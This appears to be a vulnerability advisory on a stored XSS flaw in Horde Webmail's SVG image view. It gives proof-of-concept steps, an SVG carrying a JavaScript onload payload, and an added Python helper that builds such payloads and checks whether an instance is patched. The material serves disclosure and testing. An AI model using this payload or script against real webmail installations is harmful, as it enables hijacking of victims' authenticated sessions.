Horde Groupware Webmail Stored Cross-Site Scripting (XSS) via SVG

Summary

The image view functionality in Horde Groupware Webmail Edition before 5.2.22 is affected by a stored Cross-Site Scripting (XSS) vulnerability via an SVG image upload containing a JavaScript payload. An attacker can obtain access to a victim’s webmail account by making them visit a malicious URL.

Product description (from vendor)

“Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks and notes with the standards compliant components from the Horde Project. Horde Groupware Webmail Edition bundles the separately available applications IMP, Ingo, Turba, Kronolith, Nag, Mnemo, Gollem, and Trean.” For more information visit http://www.horde.org/apps/webmail.

CVE(s)

Details

Root cause analysis

An authenticated user can attach an SVG image file to an email. Once the upload finishes, the image is served at [horde's webroot]/services/images/view.php?f=Horde<image_unique_code>. SVG files can contain JavaScript, which the browser interprets when the file is opened directly as a top-level document (for example through the /services/images/view.php endpoint mentioned above). Because that endpoint lives on the Horde installation's own origin, the script runs with access to the victim's authenticated session.

Proof of concept

  1. Login to Horde Groupware Webmail;
  2. Navigate to ‘Address Book’ > ‘New contact’;
  3. Set up an HTTP proxy, such as PortSwigger Burp (https://portswigger.net/burp), and start recording the HTTP communications;
  4. Insert an arbitrary last name and upload the following SVG file as Photo:

     <?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD
     SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg
     onload="alert(document.domain)"
     xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face
     font-family="y"/></font></defs></svg>

  5. Look at the HTTP response and find the image URL; it looks roughly like the following:

     showImage('/services/images/view.php?f=Hordea0qj7I&amp;a=rotate&amp;v=270',
     '_p_object_photo_', true);

     which translates to [horde's webroot]/services/images/view.php?f=Hordea0qj7I;

  6. Open it in the browser;
  7. The JavaScript code included in the image is executed in the browser context.

Impact

An unauthenticated attacker might be able to gain access to the victim’s webmail account by making them visit an SVG URL which triggers the stored XSS vulnerability: the payload executes in the origin of the Horde installation and can therefore issue requests with the victim’s authenticated session.

Remediation

The /services/images/view.php endpoint now sets the Content-Disposition: attachment HTTP header, forcing the web browser to download the image instead of rendering it as a document, so any script it contains is not executed in the Horde origin. Upgrade to Horde Groupware Webmail 5.2.22 or later.
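The following Python helper is an added example, not part of the Shielder advisory or of the Horde code base. It ties the proof of concept above to the remediation: it builds the SVG payload from step 4, parses the view.php URL out of an upload response of the form quoted in step 5, and classifies the headers returned for that URL so a tester can confirm whether an instance still renders the SVG inline (vulnerable) or answers with Content-Disposition: attachment (the 5.2.22 fix). It assumes the upload response contains a showImage('...view.php?f=...') call as shown above; the hostname, cookie value and sample response body are constructed placeholders.

```python
"""Added example (not Shielder's or Horde's code): helpers for the PoC above.

Assumed inputs: the upload response contains a showImage('...view.php?f=...')
call like the one quoted in the advisory, and a patched instance answers the
view.php request with a Content-Disposition: attachment header. The hostname
and session cookie used under __main__ are placeholders.
"""
import html
import re
import sys
import urllib.parse
import urllib.request
from typing import Dict, Optional

# The SVG from the proof of concept, with the onload handler parameterised.
SVG_TEMPLATE = (
    '<?xml version="1.0" standalone="no"?>'
    '<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
    '"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
    '<svg onload="{js}" xmlns="http://www.w3.org/2000/svg">'
    '<defs><font id="x"><font-face font-family="y"/></font></defs></svg>'
)


def build_svg_payload(js: str = "alert(document.domain)") -> bytes:
    """Return the PoC SVG with `js` as the onload handler, ready to upload as Photo."""
    # A literal double quote would end the attribute and break the XML (a
    # malformed SVG is not rendered at all); the browser decodes &quot;
    # before evaluating the handler, so escape it.
    return SVG_TEMPLATE.format(js=js.replace('"', "&quot;")).encode()


# Matches the showImage(...) call returned after the photo upload (step 5).
SHOW_IMAGE_RE = re.compile(r"showImage\('([^']*/services/images/view\.php\?[^']*)'")


def extract_view_url(upload_response_body: str, base_url: str) -> Optional[str]:
    """Pull the view.php URL out of the upload response, keeping only f=.

    The response is HTML, so '&' appears as '&amp;'; the a=rotate&v=270
    parameters are dropped because the bare f=Horde... URL is enough to
    trigger the payload.
    """
    match = SHOW_IMAGE_RE.search(upload_response_body)
    if not match:
        return None
    parts = urllib.parse.urlsplit(html.unescape(match.group(1)))
    image_id = urllib.parse.parse_qs(parts.query).get("f", [None])[0]
    if image_id is None:
        return None
    return urllib.parse.urljoin(
        base_url, f"{parts.path}?f={urllib.parse.quote(image_id)}"
    )


# Content types a browser renders as an SVG document when navigated to directly
# (an XML document whose root is <svg> in the SVG namespace is rendered too).
SVG_RENDERING_TYPES = {"image/svg+xml", "text/xml", "application/xml"}


def classify(headers: Dict[str, str]) -> str:
    """Judge from the view.php response headers whether the XSS is reachable.

    'mitigated'    -> Content-Disposition: attachment (the 5.2.22 fix): the
                      browser downloads the file instead of rendering it.
    'vulnerable'   -> served inline with a type the browser renders as SVG/XML.
    'inconclusive' -> served inline with another type; confirm in a browser.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    disposition = lower.get("content-disposition", "").split(";")[0].strip().lower()
    content_type = lower.get("content-type", "").split(";")[0].strip().lower()
    if disposition == "attachment":
        return "mitigated"
    if content_type in SVG_RENDERING_TYPES:
        return "vulnerable"
    return "inconclusive"


def check_view_url(view_url: str, session_cookie: str) -> str:
    """Request the stored image with the tester's own session and classify it."""
    request = urllib.request.Request(view_url, headers={"Cookie": session_cookie})
    with urllib.request.urlopen(request) as response:
        return classify(dict(response.headers.items()))


if __name__ == "__main__":
    # Usage: python3 horde_svg_check.py --payload            (writes photo.svg)
    #        python3 horde_svg_check.py <view_url> '<Cookie header value>'
    # e.g.   https://webmail.example.test/services/images/view.php?f=Hordea0qj7I
    if len(sys.argv) == 2 and sys.argv[1] == "--payload":
        with open("photo.svg", "wb") as fh:
            fh.write(build_svg_payload())
    elif len(sys.argv) == 3:
        print(check_view_url(sys.argv[1], sys.argv[2]))
    else:
        sys.exit("usage: horde_svg_check.py --payload | <view_url> <cookie>")
```

classify() deliberately treats a plain XML content type as vulnerable: browsers render an XML document whose root element is <svg> as SVG and run its handlers, so only the attachment disposition (or a content type the browser will not render, which the script reports as inconclusive for manual confirmation) counts as a fix.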

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

Credits

`polict` of Shielder

Date

20 April 2020